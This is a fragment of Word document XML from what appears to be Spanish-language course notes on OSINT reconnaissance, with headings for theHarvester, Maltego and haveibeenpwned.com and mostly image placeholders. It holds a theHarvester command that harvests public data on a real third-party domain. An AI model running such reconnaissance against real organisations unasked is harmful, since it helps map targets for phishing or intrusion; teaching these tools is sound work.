      <w:r w:rsidRPr="00E1466F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: Activar entorno virtual de Conda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740AE0EA" w14:textId="7263362E" w:rsidR="00E1466F" w:rsidRDefault="00E1466F" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E1466F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63226790" wp14:editId="5817C66D">
            <wp:extent cx="4914900" cy="1732958"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="189886370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370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32655" cy="17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9CAC" w14:textId="2146F344" w:rsidR="00DE2243" w:rsidRPr="00DE2243" w:rsidRDefault="00DE2243" w:rsidP="00DE2243">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2243">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>PASO 2: Ejecutar theHarvester con ayuda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7BF55C" w14:textId="0C4A5FE5" w:rsidR="00DE2243" w:rsidRDefault="00BB7123" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7123">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C4D8E43" wp14:editId="6CF99B2E">
            <wp:extent cx="4864100" cy="1684870"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19221428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28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8759" cy="16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3973" w14:textId="7C89EEFF" w:rsidR="007D2279" w:rsidRDefault="007D2279" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D2279">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52A2B36F" wp14:editId="628B4CF5">
            <wp:extent cx="4565650" cy="2218145"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="20051189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8940" name="Imagen 1" descr="Texto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1580" cy="22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BE8" w14:textId="444FD9B9" w:rsidR="00681991" w:rsidRDefault="00681991" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00681991">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46D3E0E4" wp14:editId="26E32EDD">
            <wp:extent cx="4660900" cy="2470278"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="17385834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3471" name="Imagen 1" descr="Texto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66196" cy="24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681991">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46607861" wp14:editId="371309A8">
            <wp:extent cx="4705350" cy="2664187"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="16100590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59069" name="Imagen 1" descr="Texto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23977" cy="26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FC8" w14:textId="7C881DCD" w:rsidR="00AB1B5F" w:rsidRDefault="00AB1B5F" w:rsidP="0007752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1896B81" wp14:editId="43BA1C74">
            <wp:extent cx="6845300" cy="3168650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1216734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B3B825" wp14:editId="698C3AD6">
            <wp:extent cx="6845300" cy="3314700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3882033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2E6FC51" wp14:editId="141E4D68">
            <wp:extent cx="6845300" cy="3397250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3198329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285FAF1" wp14:editId="0FAA5227">
            <wp:extent cx="6858000" cy="3403600"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="4815767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BEF0D41" wp14:editId="42D565AC">
            <wp:extent cx="6845300" cy="2743200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1701582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2075" w14:textId="0EC979F0" w:rsidR="00323BD9" w:rsidRDefault="00323BD9" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00323BD9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python theHarvester.py -d udemy.com -l 100 -b all -f scan_microsoft_tello</w:t>
      </w:r>
      <w:r w:rsidRPr="00323BD9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAF446F" w14:textId="77777777" w:rsidR="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69C2A6CB" w14:textId="77777777" w:rsidR="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="013353DF" w14:textId="77777777" w:rsidR="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15DC1E9A" w14:textId="77777777" w:rsidR="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58C03A61" w14:textId="77777777" w:rsidR="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6482B14A" w14:textId="77777777" w:rsidR="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="795CB600" w14:textId="77777777" w:rsidR="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63F6570D" w14:textId="77777777" w:rsidR="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E83488" w14:textId="77777777" w:rsidR="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36B06DC3" w14:textId="77777777" w:rsidR="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D61B524" w14:textId="77777777" w:rsidR="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E13D1E" w14:textId="77777777" w:rsidR="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="579F786C" w14:textId="77777777" w:rsidR="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="580EF5E9" w14:textId="77777777" w:rsidR="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="106F86D6" w14:textId="77777777" w:rsidR="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="594863AB" w14:textId="77777777" w:rsidR="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15ACA370" w14:textId="77777777" w:rsidR="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EC2F982" w14:textId="77777777" w:rsidR="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76AC4E00" w14:textId="77777777" w:rsidR="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1052500F" w14:textId="77777777" w:rsidR="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C43DAE4" w14:textId="77777777" w:rsidR="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C549352" w14:textId="22595EA4" w:rsidR="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="002D5CE1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D5CE1">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.1.9.3.7 Resultado de </w:t>
      </w:r>
      <w:r w:rsidRPr="002D5CE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python theHarvester.py -d udemy.com -l 100 -b all -f scan_microsoft_tello</w:t>
      </w:r>
      <w:r w:rsidRPr="00323BD9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1957AE59" w14:textId="10EB2ADE" w:rsidR="002D5CE1" w:rsidRPr="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="002D5CE1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C16C4DC" wp14:editId="2874B0CB">
            <wp:extent cx="6845300" cy="2984500"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1186428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4B02D90C" wp14:editId="2017D632">
            <wp:extent cx="6845300" cy="2978150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="211962487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7F2460FB" wp14:editId="6B3AB2E8">
            <wp:extent cx="6851650" cy="3638550"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="7201975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EC554DC" wp14:editId="734F4403">
            <wp:extent cx="6858000" cy="2641600"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="207338430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F2CE5AD" wp14:editId="34593DA8">
            <wp:extent cx="6851650" cy="2635250"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="19391080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5B92828B" wp14:editId="09EF87EC">
            <wp:extent cx="6858000" cy="2381250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12250424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6A14F53" wp14:editId="4BDC8533">
            <wp:extent cx="6851650" cy="2635250"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="135492915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513DAE0" wp14:editId="0EBDC9E5">
            <wp:extent cx="6845300" cy="2635250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1674832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7E6F311D" wp14:editId="3CB344E0">
            <wp:extent cx="6851650" cy="2870200"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="4589092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08DFFCA5" wp14:editId="0AE45F83">
            <wp:extent cx="6851650" cy="2863850"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="186885018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58E2052F" wp14:editId="06B1DA97">
            <wp:extent cx="6851650" cy="2755900"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="5658627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1842296" wp14:editId="1FD030C1">
            <wp:extent cx="6845300" cy="2755900"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="155540069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80DE" w14:textId="77777777" w:rsidR="002D5CE1" w:rsidRDefault="002D5CE1" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E5081DB" w14:textId="77777777" w:rsidR="000B24E9" w:rsidRDefault="000B24E9" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B8AB99E" w14:textId="77777777" w:rsidR="000B24E9" w:rsidRDefault="000B24E9" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14E821B5" w14:textId="77777777" w:rsidR="000B24E9" w:rsidRDefault="000B24E9" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ACEE0FE" w14:textId="77777777" w:rsidR="000B24E9" w:rsidRDefault="000B24E9" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26364863" w14:textId="77777777" w:rsidR="000B24E9" w:rsidRDefault="000B24E9" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5793FE34" w14:textId="77777777" w:rsidR="000B24E9" w:rsidRDefault="000B24E9" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A489325" w14:textId="77777777" w:rsidR="000B24E9" w:rsidRDefault="000B24E9" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78539363" w14:textId="77777777" w:rsidR="000B24E9" w:rsidRDefault="000B24E9" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7058A985" w14:textId="77777777" w:rsidR="000B24E9" w:rsidRDefault="000B24E9" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19B053CB" w14:textId="77777777" w:rsidR="000B24E9" w:rsidRDefault="000B24E9" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29A6C120" w14:textId="77777777" w:rsidR="000B24E9" w:rsidRDefault="000B24E9" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CD51365" w14:textId="1026B563" w:rsidR="000B24E9" w:rsidRDefault="007C6A1B" w:rsidP="0007752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14CBFE0" wp14:editId="1A6B0252">
            <wp:extent cx="4609942" cy="3086100"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="20322450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69" cy="30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7C1B333" wp14:editId="31580410">
            <wp:extent cx="4616450" cy="624076"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="180126887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59" cy="6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024F863" wp14:editId="77920E5C">
            <wp:extent cx="4629150" cy="3016027"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="63227504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82" cy="3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05BF2D08" wp14:editId="04083CD9">
            <wp:extent cx="3962400" cy="2615918"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="119081366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45" cy="26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B3E798D" wp14:editId="314BDE70">
            <wp:extent cx="4242559" cy="2235200"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="2457004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87" cy="22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ECF5762" wp14:editId="2482A3DF">
            <wp:extent cx="3878616" cy="2273300"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="213406012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96" cy="22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3F619E35" wp14:editId="6E66CC0A">
            <wp:extent cx="4241800" cy="2350877"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="61263773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54" cy="23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3266211C" wp14:editId="63C7FA40">
            <wp:extent cx="4549840" cy="2686050"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="15775201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97" cy="26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12F2A75" wp14:editId="5D07BEB8">
            <wp:extent cx="4152900" cy="1966758"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="62760533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05" cy="19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06F3" w14:textId="77777777" w:rsidR="008126F8" w:rsidRDefault="008126F8" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58E05B29" w14:textId="77777777" w:rsidR="008126F8" w:rsidRDefault="008126F8" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="136FF318" w14:textId="77777777" w:rsidR="008126F8" w:rsidRDefault="008126F8" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="103BC65C" w14:textId="77777777" w:rsidR="008126F8" w:rsidRDefault="008126F8" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BA0933E" w14:textId="77777777" w:rsidR="008126F8" w:rsidRDefault="008126F8" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D29599" w14:textId="77777777" w:rsidR="008126F8" w:rsidRDefault="008126F8" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D2709A1" w14:textId="77777777" w:rsidR="008126F8" w:rsidRDefault="008126F8" w:rsidP="00077524">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C26C247" w14:textId="07B9AE3E" w:rsidR="008126F8" w:rsidRPr="006D4D78" w:rsidRDefault="008126F8" w:rsidP="008126F8">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="006D4D78">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.9 Maltego</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7CD5EB" w14:textId="7E625599" w:rsidR="00C35F29" w:rsidRDefault="00C35F29" w:rsidP="00C35F29">
      <w:r w:rsidRPr="00C35F29">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76B52D3D" wp14:editId="7BF5CDD5">
            <wp:extent cx="6523285" cy="2438611"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2013964738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64738" name="Imagen 1" descr="Pantalla de computadora con letras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F29">
        <w:br/>
        <w:t>Esto descarga la última versión d</w:t>
      </w:r>
      <w:r>
        <w:t>e maltego</w:t>
      </w:r>
      <w:r w:rsidR="00185E10">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00185E10" w:rsidRPr="00185E10">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21F4B413" wp14:editId="6EEA8570">
            <wp:extent cx="5037257" cy="2453853"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="58465987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9876" name="Imagen 1" descr="Pantalla de computadora con letras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08E">
        <w:br/>
      </w:r>
      <w:r w:rsidR="004F108E" w:rsidRPr="004F108E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D7ADB86" wp14:editId="0810468E">
            <wp:extent cx="6858000" cy="4319270"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1962224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428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AB93" w14:textId="057F296A" w:rsidR="00991477" w:rsidRDefault="00991477" w:rsidP="00C35F29">
      <w:r w:rsidRPr="00991477">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A646926" wp14:editId="4612B6C1">
            <wp:extent cx="5959356" cy="3619814"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="31208043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80435" name="Imagen 1" descr="Diagram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1A41" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="406C3345" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="64B66F37" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="2827C3B0" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="24F66EAE" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="44AECB6E" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="3F53F9B6" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="6C39571A" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="2911576E" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="42E54A2E" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="64F13E76" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="1BB60665" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="350A6EC2" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="1C2C95D3" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="45AC6461" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="1C02BF02" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="6462CEC4" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="3851C36B" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="58AC7303" w14:textId="77777777" w:rsidR="00D75B55" w:rsidRDefault="00D75B55" w:rsidP="00C35F29"/>
    <w:p w14:paraId="21E41D00" w14:textId="3EDC54EC" w:rsidR="00D75B55" w:rsidRPr="00D013FF" w:rsidRDefault="00D75B55" w:rsidP="00D75B55">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006027BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.</w:t>
      </w:r>
      <w:r w:rsidR="006027BA" w:rsidRPr="006027BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="006027BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidR="006027BA" w:rsidRPr="006027BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>https://haveibeenpwned.com/</w:t>
      </w:r>
    </w:p>
